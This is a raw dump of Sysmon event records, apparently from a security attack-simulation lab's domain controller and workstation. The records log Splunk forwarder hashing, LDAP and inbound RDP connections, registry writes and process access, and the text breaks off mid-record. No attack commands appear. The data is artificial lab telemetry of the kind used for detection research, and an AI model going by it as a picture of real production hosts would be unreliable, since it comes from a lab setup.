23542300x8000000000000000976255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:17.357{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85C0D19CA84B7E96799E059809B9BA48,SHA256=B28B245DB8BFB4611E36C7E5BBB5A4FA586EF694DE4EDB522FA43597E25A6A5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:15.925{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49205-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001047731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:15.925{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49205-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001047730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:15.614{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-61037-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:17.233{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D69F92D5EEEA8BB1F71878A3E7D6755,SHA256=283D9FF67D97B9CB8ED67DDA23FED90B0B56B45705DBC80FC6B282A097FECE9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:17.233{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF5A54CC93EE18156FFF763A2B556852,SHA256=B761A20D9E82B022682B04FA4F94320F42D29FA25ECD8FACE7353CDCFFCE89AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:17.086{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970DFA2A99EE629787EC2D59575ECAC3,SHA256=E3B491C1F8FDB9177E8CEBE02A5A1163C0CF924FD21699856E1268711EB23865,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:13.844{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59246-false10.0.1.12-8000- 23542300x8000000000000000976257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:18.872{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3FB307796755AC51AB61EC79A665E89,SHA256=1E5AAD23022D2B367B3E9A36F04D07238B95A72D59403E0B32D4BFA6BAABC906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:18.357{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1960EE30921BF5EE3AE40E9E06FEBB7E,SHA256=31E10B969294F4B018B4543197A2151A475D55C4D1ED15573A3D79A06A698EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:18.108{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0385D34AE4EC405A0487D4336BFF1AC9,SHA256=CD13FD79F959F67ABAA3BD8E3B7776CFBE00F218C9B25AA4181B68A8E97CF748,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:15.755{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-10162-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:19.372{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=415FAC7B1617AD34F72B556661A44083,SHA256=28231DF22E197EA2486766EEE82D947AEB92F3475E560CFBF3C1DA066A7D91B6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:19.375{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txt2021-09-27 08:10:19.295 23542300x80000000000000001047735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:19.374{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txtMD5=F0BCBF359DD9271C690803A1DD7B8B46,SHA256=B5B6D73FAA5C2DE2D4AE521207D32443608DE05D69694AB33F781B7BA8F6DB07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:19.142{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C575C5D7B6FA3069E048701DF326F0,SHA256=E567C10C690003371F0D0E28521160E74F0F2082E4822A2B6409B848F2843852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:20.919{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=696152B36299607205516B162E0FE850,SHA256=E411E5920ACBDBB0DCF5C7B4B8F1AA4332FC651105C29490F8DC27E05ED2FCAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:17.879{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-22425-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:20.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0058F3FC104BF314F4D161E923BFA7,SHA256=B646A7D3D80FEB10034BA46AC07F0041EF8815623107A1FB0187F537F24E2F2F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001047743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:00:20.725{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x80000000000000001047742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:00:20.725{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x80000000000000001047741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:00:20.725{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x80000000000000001047740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:00:20.725{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d7b37e-0x19965d84) 13241300x80000000000000001047739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:00:20.725{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x80000000000000001047738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:00:20.725{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 23542300x80000000000000001047737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:20.157{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9C1A74FDE55D03752DF251A03E159A,SHA256=CB5FB844EB40B4852CB873CE3D85C8C6017568422497BB62AC1588F67BE232FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:21.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B7AE42794D86B2DCEAB97DB700A3EF0,SHA256=43161BC2498BE21F151AA97A55FD7993A849D547B3E6D2ACC1A3CC679FABA0F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:21.176{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=805AAE71845D9EB7A1CDEAEADDE65865,SHA256=F4F9857F62A190E2DAF3B7861015CF596F2DAE8DE07401427F83142B43814B66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:22.968{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08A4F7CC56CAB171C6DC6DE9E689FB73,SHA256=E051A465D3616CBE943B4DC8745B635DC5E2B084D86F62C13979FAB7336A06DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:19.900{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-34549-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:19.876{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59247-false10.0.1.12-8000- 23542300x8000000000000000976264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:22.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63E2A55C7D7DB80E70C0D5075F66B9A2,SHA256=ECC5DB6701BB466B392F4873114242FC819CE08EF3A9507488426603D35BC865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:22.192{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81B3EB4C319CB51B04EC3335A9FE9222,SHA256=581647B436CA800BA79892507D621A3DFF6D1334D1428A4A3B152DFC9A89F21F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:23.405{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A548A094FAA7EC15B32F92B09841762A,SHA256=EC33E91DF2129E281969C1B38A597EA162A2C11AAF089AE708065CC9457A7576,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:23.607{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:23.223{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44877F0055C754D146A6CB7C617F566F,SHA256=A713DFF6039B775894B8E938D6B5169EDF8C804C164D6641FBEFEE58B15A18DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:23.154{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD4A016844E43DD9811588470009824E,SHA256=FF09017E8BB261895236CDEDA87A24F9B1588D138D21C154A56CFA179B86CD9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:23.154{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D69F92D5EEEA8BB1F71878A3E7D6755,SHA256=283D9FF67D97B9CB8ED67DDA23FED90B0B56B45705DBC80FC6B282A097FECE9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:20.747{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49206-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:24.718{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C9B9999B10F395BEAB14EBEC4DDA3068,SHA256=ADB2B9F9137234EF1537D43885F2D9C9DC57FDEA13AD86195E033219DCCC176D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:22.061{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50531-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:24.421{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA3EBCFDBA561E2F34D7D10A419924A2,SHA256=41A5DEB07AF8B49B40DE173D96B1E29E1CBFCA01FCFC9910BCF7AAD3D44F212F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:24.237{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAA7BEDEDC95C035E652AF42B8680AE,SHA256=99BC9C6D59FF002924BE616EDBA4D272201C7C09801BB37A5F86522F0A410760,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:21.853{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62627-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:21.515{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65391-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:25.252{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D2D28B4FBFA5CAE7E35076F9EB7765,SHA256=2FB77AD63192C20A01BC8629CE743664B51262E61A558BEAFB256C5B20355EFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8829-6151-7379-00000000FD01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL